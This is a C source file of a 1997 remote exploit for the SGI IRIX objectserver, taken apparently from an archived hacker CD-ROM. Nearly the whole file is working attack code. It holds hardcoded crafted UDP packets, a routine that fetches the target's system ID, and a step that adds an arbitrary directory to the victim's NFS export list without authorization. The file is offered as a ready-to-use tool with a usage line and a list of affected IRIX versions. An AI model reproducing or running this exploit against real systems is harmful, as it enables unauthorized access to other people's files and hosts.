home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_objectserver2.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  6.1 KB  |  235 lines
  1. /*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
  2. /*## objectserver                                                            #*/
  3.  
  4. /*   SGI objectserver "export" exploit                                        */
  5. /*   Remotely adds new entry to the export list on the IRIX system.           */
  6. /*   See our SGI objectserver "account" exploit for more information.         */
  7. /*   Only directories that aren't supersets of already exported ones          */
  8. /*   can be added to the export list.                                         */
  9.  
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <arpa/inet.h>
  14. #include <netdb.h>
  15. #include <sys/uio.h>
  16. #include <errno.h>
  17. #include <stdio.h>
  18. #define E if(errno) perror("");
  19.  
  20. struct iovec iov[2];
  21. struct msghdr msg;
  22. char buf1[1024],buf2[1024];
  23. int sck;
  24. unsigned long adr;
  25.  
  26. void show_msg(){
  27.     char *p,*p1;
  28.     int i,j,c,d;
  29.  
  30.     c=0;
  31.     printf("%04x   ",iov[0].iov_len);
  32.     p=(char*)iov[0].iov_base;
  33.     for(i=0;i<iov[0].iov_len;i++){
  34.         c++;
  35.         if(c==17){
  36.              printf("    ");
  37.              p1=p;p1=p1-16;
  38.              for(j=0;j<16;j++){
  39.                  if(isprint(*p1)) printf("%c",*p1);
  40.                  else printf(".");
  41.                  p1++;
  42.              }
  43.              c=1;
  44.              printf("\n       ");
  45.         }
  46.         printf("%02x ",(unsigned char)*p++);
  47.     }
  48.     printf("    ");
  49.     p1=p;p1=p1-c;
  50.     if(c>1){
  51.         for(i=0;i<(16-c);i++) printf("   ");
  52.         for(i=0;i<c;i++){
  53.             if(isprint(*p1)) printf("%c",*p1);
  54.             else printf(".");
  55.             p1++;
  56.         }
  57.     }
  58.     printf("\n");
  59.     if(msg.msg_iovlen!=2) return;
  60.  
  61.     c=0;
  62.     p=(char*)iov[0].iov_base;
  63.     d=p[0x0a]*0x100+p[0x0b];
  64.     p=(char*)iov[1].iov_base;
  65.     printf("%04x   ",d);
  66.     for(i=0;i<d;i++){
  67.         c++;
  68.         if(c==17){
  69.              printf("    ");
  70.              p1=p;p1=p1-16;
  71.              for(j=0;j<16;j++){
  72.                  if(isprint(*p1)) printf("%c",*p1);
  73.                  else printf(".");
  74.                  p1++;
  75.              }
  76.              c=1;
  77.              printf("\n       ");
  78.         }
  79.         printf("%02x ",(unsigned char)*p++);
  80.     }
  81.     printf("    ");
  82.     p1=p;p1=p1-c;
  83.     if(c>1){
  84.         for(i=0;i<(16-c);i++) printf("   ");
  85.         for(i=0;i<c;i++){
  86.             if(isprint(*p1)) printf("%c",*p1);
  87.             else printf(".");
  88.             p1++;
  89.         }
  90.     }
  91.     printf("\n");
  92.     fflush(stdout);
  93. }
  94.  
  95. char numer_one[0x10]={
  96.     0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  97.     0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
  98. };
  99.  
  100. char numer_two[0x24]={
  101.     0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
  102.     0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
  103.     0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
  104.     0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
  105.     0x01,0x07,0x01,0x01
  106. };
  107.  
  108. char dodaj_one[0x10]={
  109.     0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
  110.     0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
  111. };
  112.  
  113. char dodaj_two[1024]={
  114.     0x1c,0x03,0x00,0x43,0x01,0x04,0x0a,0x01,
  115.     0x01,0x3b,0x01,0x78
  116. };
  117.  
  118. char dodaj_three[27]={
  119.     0x01,0x02,0x0a,0x01,0x01,0x3b,0x01,
  120.     0xd2,0x00,0x00,0x80,0x43,0x01,0x04,0x17,
  121.     0x0b,0x01,0x01,0x3b,0x01,0x02,0x01,0x01,
  122.     0x01,0x09,0x43,0x01
  123. };
  124.  
  125. char dodaj_four[47]={
  126.     0x17,0x0b,0x01,0x01,0x3b,0x01,0xd2,
  127.     0x01,0x04,0x01,0x09,0x43,0x01,0x04,0x72,
  128.     0x6f,0x6f,0x74,0x17,0x0b,0x01,0x01,0x3b,
  129.     0x01,0xd2,0x01,0x08,0x01,0x07,0x01,0x01,
  130.     0x17,0x0b,0x01,0x01,0x3b,0x01,0x01,0x01,
  131.     0x01,0x01,0x0f,0x02,0xff,0xff,0xff,0xff
  132. };
  133.  
  134. char fake_adrs[0x10]={
  135.     0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
  136.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  137. };
  138.  
  139. char *get_sysinfo(){
  140.     int i=0,j,len;
  141.  
  142.     iov[0].iov_base=numer_one;
  143.     iov[0].iov_len=0x10;
  144.     iov[1].iov_base=numer_two;
  145.     iov[1].iov_len=0x24;
  146.     msg.msg_name=(caddr_t)fake_adrs;
  147.     msg.msg_namelen=0x10;
  148.     msg.msg_iov=iov;
  149.     msg.msg_iovlen=2;
  150.     msg.msg_accrights=(caddr_t)0;
  151.     msg.msg_accrightslen=0;
  152.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  153.     printf("\n");
  154.  
  155.     iov[0].iov_base=buf1;
  156.     iov[1].iov_base=buf2;
  157.     iov[1].iov_len=0x200;
  158.     msg.msg_iovlen=2;
  159.     printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
  160.     printf("\n");
  161.     while(i<len-0x16)
  162.         if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
  163.             printf("remote system ID: ");
  164.             for(j=0;j<buf2[i+6];j++) printf("%02x ",(unsigned char)buf2[i+7+j]);
  165.             printf("\n");
  166.             return(&buf2[i+6]);
  167.         }else i++;
  168.     return(0);
  169. }
  170.  
  171. void new_export(int len){
  172.     iov[0].iov_base=dodaj_one;
  173.     iov[0].iov_len=0x10;
  174.     iov[1].iov_base=dodaj_two;
  175.     iov[1].iov_len=len;
  176.     msg.msg_name=(caddr_t)fake_adrs;
  177.     msg.msg_namelen=0x10;
  178.     msg.msg_iov=iov;
  179.     msg.msg_iovlen=2;
  180.     msg.msg_accrights=(caddr_t)0;
  181.     msg.msg_accrightslen=0;
  182.     printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
  183.     printf("\n");
  184.  
  185.     iov[0].iov_base=buf1;
  186.     iov[1].iov_base=buf2;
  187.     iov[1].iov_len=0x200;
  188.     msg.msg_iovlen=2;
  189.     printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
  190.     printf("\n");
  191. }
  192.  
  193. void info(char *text) {
  194.     printf("usage: %s address directory\n",text);
  195. }
  196.  
  197. main(int argc,char **argv){
  198.     int probe=0;
  199.     unsigned int offset;
  200.     char *sys_info;
  201.  
  202.     printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
  203.     printf("objectserver for irix 5.2 5.3 6.2\n\n");
  204.  
  205.     if(argc<2) {info(argv[0]);exit(0);}
  206.     else if(argc==2) probe=1;
  207.     offset=39;
  208.     adr=inet_addr(argv[1]);
  209.  
  210.     sck=socket(AF_INET,SOCK_DGRAM,0);
  211.     memcpy(&fake_adrs[4],&adr,4);
  212.     memcpy(&dodaj_four[43],&adr,4);
  213.  
  214.     if(!(sys_info=get_sysinfo())){
  215.         printf("error: can't get system ID for %s.\n",argv[1]);
  216.         exit(1);
  217.     }
  218.     if(!probe){
  219.         memcpy(&dodaj_two[0x0c],sys_info,sys_info[0]+1);
  220.         memcpy(&dodaj_two[0x0c+sys_info[0]+1],&dodaj_three[0],27);
  221.  
  222.         offset+=sys_info[0]+1;
  223.         dodaj_two[offset++]=strlen(argv[2]);
  224.  
  225.         memcpy(&dodaj_two[offset],argv[2],strlen(argv[2])); 
  226.         offset+=strlen(argv[2]); 
  227.         memcpy(&dodaj_two[offset],&dodaj_four[0],47);
  228.         offset+=47;
  229.         dodaj_one[10]=offset>>8;
  230.         dodaj_one[11]=offset&0xff;
  231.         new_export(offset);
  232.     }else printf("error: no directory specified.\n"); 
  233. }
  234.  
  235.